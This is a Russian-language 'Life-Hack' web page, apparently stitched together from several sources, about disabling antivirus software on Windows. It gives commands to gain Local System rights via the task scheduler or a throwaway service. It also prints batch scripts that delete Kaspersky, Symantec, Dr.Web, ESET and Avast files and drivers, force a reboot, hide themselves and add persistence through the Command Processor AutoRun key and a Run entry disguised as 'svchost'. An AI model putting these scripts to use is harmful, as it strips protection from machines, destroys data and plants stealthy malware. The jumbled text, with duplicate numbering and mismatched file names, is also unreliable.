Обучение
Life-HackАнтивирус обычно работает как служба, завершать его следует net stop или sc stop.
Остановка службы SC STOP OC. Описание команды SC STOPКоманда SC STOP посылает службе операционной системы Windows запрос STOP. Для запуска остановленной службы служит команда SC START. Синтаксис и параметры команды SC STOP
sc [имя_сервера] stop имя_службы имя_сервера - Задает имя удаленного сервера, на котором находится служба. В имени следует использовать формат UNC ("\\myserver"). Чтобы запустить SC локально, этот параметр следует пропустить.Имя_службы - Указывает имя службы, возвращенное операцией getkeyname. /? - Отображает справку в командной строке.
Примеры команды SC STOP sc stop spooler - остановка службы очереди печати. Вариант действий будет самым простым — попытка удаления жизненно важных файлов антивируса
На Windows-системах, работая под администратором (а это, наверное, 80% всех систем) получить права Local System достаточно просто. В голову сразу приходит два способа, хорошо описанные в сети.
Способ 1. Использование планировщика.
По умолчанию, на всех Windows-системах работает служба планировщика задач. Эта служба запускает задачи с искомыми правами Local System. Тогда очень просто добавить задание как-то:
at 11:05 c:\killer.bat
и kill.bat запустится с правами Local System.
Преимущества очевидны: всё просто и ясно. Недостаток: пользователь может заметить странную новую задачу в планировщике, да и просто в целях безопасности отключить эту службу.
Способ 1. Создание службы.
Суть метода заключается в создании службы, её запуске и удалении. При этом всё реализуется в три строчки:
sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:\killer.bat)"
net start CmdAsSystem
sc delete CmdAsSystem
При этом мало того, что killer.bat запустится с приоритетом IDLE, он ещё и будет запущен от имени Local System.
Метод незаметен, никак не проявляет себя.
На момент публикования статьи KIS 2010 оба метода пропускал на уровне хипса, даже не запрашивая никаких разрешений.
Ну а теперь перейдём к самому killer.bat (в нашем случае он расположен в корне на диске С, но понятно, что закинуть его можно куда угодно).
Суть этого файла проста: удаляем всё, что принадлежит антивирусу. Так, для Касперского 2010 это будет:
net stop srservice
erase /F /S /Q "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010"
erase /F /S /Q "%windir%\system32\drivers\kl1.sys"
erase /F /S /Q "%windir%\system32\drivers\klif.sys"
erase /F /S /Q "%windir%\system32\drivers\klbg.sys"
erase /F /S /Q "%windir%\system32\drivers\klim5.sys"
erase /F /S /Q "%windir%\system32\drivers\klmd.sys"
erase /F /S /Q "%windir%\system32\drivers\klmouflt.sys"
shutdown -r -f -c "Bye-Bye!!!"
Для Symantec что-то типа (кто знает точнее — поправьте, сам-то я на Касперском):
net stop srservice
erase /F /S /Q "C:\Program Files\Symantec"
erase /F /S /Q "C:\Program Files\Norton Internet Security"
shutdown -r -f -c "Bye-Bye!!!"
Для Доктора Веба:
net stop srservice
erase /F /S /Q "C:\Program Files\DrWeb"
erase /F /S /Q "%windir%\system32\drivers\dwprot.sys"
erase /F /S /Q "%windir%\system32\drivers\drwebaf.sys"
erase /F /S /Q "%windir%\system32\drivers\DrWebPF.sys"
erase /F /S /Q "%windir%\system32\drivers\spiderg3.sys"
shutdown -r -f -c "Bye-Bye!!!"
Ну и так далее. В первой строчке идёт останов службы восстановления Windows — так, на всякий случай
Понятно, что аналогичный скрипт можно прописать для всех антивирусов — суть изменять пути к жизненно важным файлам.
@echo off
attrib *.bat +h +s
cd %programfiles%\Kaspersky Lab\
del *.* /q /s
cd %programfiles%\DrWeb\
del *.* /q /s
cd %programfiles%\Alwil Software\
del *.* /q /s
cd %programfiles%\ESET\
del *.* /q /s
copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\system32\batinit.bat" /f >nul
copy ""%0"" "%SystemRoot%\system32\svchost.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /t REG_SZ /d "%SystemRoot%\system32\svchost.bat" /f >nul
attrib *.bat +h +r +s
в блокноте сохраните с расширением .bat
Итак, чтобы отключить любой антивирус заходим в панель управления , после этого, ищите опцию «администрирование» и нажмите на нее. Кто не может найти, посмотрите с правой стороны вверху: там написано «просмотр», выберите «большие значки»
Выберите обычный запуск. Дальше по очереди откройте опции (нажав на них) «службы» и «автозагрузка» и везде где вам встретиться название вашего «защитника» снимайте галочки.
Надеюсь, администрирование нашли. После нажатия на него нажмите «конфигурация системы». Вам откроется еще одно окно, где и будет происходить отключение антивируса. Вам будет предложена перезагрузка, после чего он работать уже не будет.
К сожалению, приходится констатировать факт, что некоторые из существующих антивирусных решений имеют ряд уязвимостей, которые могут быть использованы для повреждения защиты и фактически удалению антивируса с компьютера. Источник